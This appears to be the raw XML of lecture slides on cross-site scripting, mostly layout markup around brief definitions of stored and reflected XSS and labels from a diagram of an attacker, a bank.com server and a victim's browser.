            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36495503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E917C4-F506-9648-9A79-D210EAEE3E77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED18576-30E0-CB4D-938D-3794A143B9AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8839200" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored XSS                                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker leaves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JavasScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lying around on benign web service for victim to load</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected XSS                              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker gets user to click on specially-crafted URL with script in it, web service  reflects script back</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66A5492-5BD5-9247-8FD1-0BFD19ADE02F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2772000" y="274638"/>
            <a:ext cx="6372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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320135278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FC0C3F-0E52-3D48-9772-B24D78910EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{091E8152-C437-F54D-B446-19C79F191A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker manages to store a malicious script at the web server, e.g., at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server later unwittingly sends script to a victim’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser runs script in the same origin as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101281306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5631877" y="1905000"/>
            <a:ext cx="2301433" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5541962" y="1539240"/>
            <a:ext cx="2522855" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F76FF3-4EC0-5242-B461-F0546D61F0C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a: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5959475" y="4979988"/>
            <a:ext cx="1148521" cy="140646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5631877" y="1905000"/>
            <a:ext cx="2301433" cy="846137"/>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6477086" y="2752725"/>
            <a:ext cx="1905" cy="1704339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="1704339">
                <a:moveTo>
                  <a:pt x="1501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1703884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430691" y="4410159"/>
            <a:ext cx="92844" cy="116893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092825" y="6449822"/>
            <a:ext cx="918210" cy="269240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5541962" y="1539240"/>
            <a:ext cx="2522855" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="2696972"/>
            <a:ext cx="2899410" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1405890">
              <a:lnSpc>
                <a:spcPts val="2130"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1384300" marR="480059">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inject  malicious  script</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2600" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94619E8E-1947-B640-9986-FB6DF588F7F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B213992C-ABEE-F44F-A244-C4D01CE77577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a: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09600" y="2678536"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="4979988"/>
            <a:ext cx="1148521" cy="1406460"/>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5631877" y="1905000"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477086" y="2752725"/>
            <a:ext cx="1905" cy="1704339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="1704339">
                <a:moveTo>
                  <a:pt x="1501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1703884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430691" y="4410159"/>
            <a:ext cx="92844" cy="116893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="3901440"/>
            <a:ext cx="1290955" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
